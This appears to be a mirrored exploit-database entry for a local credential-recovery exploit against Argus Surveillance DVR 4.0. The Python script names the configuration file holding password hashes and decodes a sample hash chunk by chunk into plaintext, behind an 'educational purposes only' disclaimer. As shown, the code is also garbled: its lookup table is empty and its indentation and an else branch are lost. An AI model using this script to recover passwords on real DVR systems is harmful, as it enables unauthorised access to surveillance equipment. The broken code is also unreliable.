Argus surveillance dvr 4.0 weak password encryption Vulnerability / Exploit

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Exploits / Vulnerability Discovered : 2021-07-16 | Type : local | Platform : windows
This exploit / vulnerability Argus surveillance dvr 4.0 weak password encryption is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Argus Surveillance DVR 4.0 - Weak Password Encryption
# Exploit Author: Salman Asad (@LeoBreaker1411 / deathflash1411)
# Date: 12.07.2021
# Version: Argus Surveillance DVR 4.0
# Tested on: Windows 7 x86 (Build 7601) & Windows 10
# Reference:

# Note: Argus Surveillance DVR 4.0 configuration is present in
# C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini

# I'm too lazy to add special characters :P
characters = {

# ASCII art is important xD
banner = '''
# _____ Surveillance DVR 4.0 #
# / _ \_______ ____ __ __ ______ #
# / /_\ \_ __ \/ ___\| | \/ ___/ #
# / | \ | \/ /_/ > | /\___ \ #
# \____|__ /__| \___ /|____//____ > #
# \/ /_____/ \/ #
# Weak Password Encryption #
############ @deathflash1411 ############

# Change this :)
pass_hash = "418DB740F641E03B956BE1D03F7EF6419083956BECB453D1ECB4ECB4"
if (len(pass_hash)%4) != 0:
print("[!] Error, check your password hash")
split = []
n = 4
for index in range(0, len(pass_hash), n):
split.append(pass_hash[index : index + n])

for key in split:
if key in characters.keys():
print("[+] " + key + ":" + characters[key])
print("[-] " + key + ":Unknown")